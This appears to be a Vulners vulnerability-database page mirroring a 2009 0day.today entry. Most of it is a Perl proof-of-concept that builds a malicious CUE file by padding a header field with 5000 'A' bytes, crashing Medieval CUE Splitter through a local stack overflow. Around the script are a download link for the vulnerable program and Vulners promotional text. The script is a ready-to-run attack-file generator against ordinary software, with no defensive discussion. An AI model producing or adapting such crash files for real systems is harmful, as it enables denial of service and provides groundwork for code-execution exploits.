Lucene search
K

Medieval CUE Splitter Local Stack Overflow PoC

🗓️ 20 Jul 2009 00:00:00Reported by ViRuS_HaCkErSType 
zdt
 zdt
🔗 0day.today👁 24 Views

A Perl script to create a local stack overflow in Medieval CUE Splitte

Code
==============================================
Medieval CUE Splitter Local Stack Overflow PoC
==============================================


#!/usr/bin/perl
#Medieval CUE Splitter Local Stack Overflow PoC
# By ViRuS_HaCkErS
# Big THnx to THE DOOM FINAL BLUE HACKER ALL SPIDERS TEAM
# down: http://www.medieval.it/sw/cuesplitter_setup.exe
my $header1=    
"\x46\x49\x4c\x45\x20\x22";
my $header2=
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20".
"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32".
"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31".
"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30";
my $crash = "\x41" x 5000;
open(my $playlist, "> exploit.cue");
print $playlist $header1.$crash.$header2 ;
                                     
close $playlist;



#  0day.today [2018-02-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2009 00:00Current
7High risk
Vulners AI Score7
24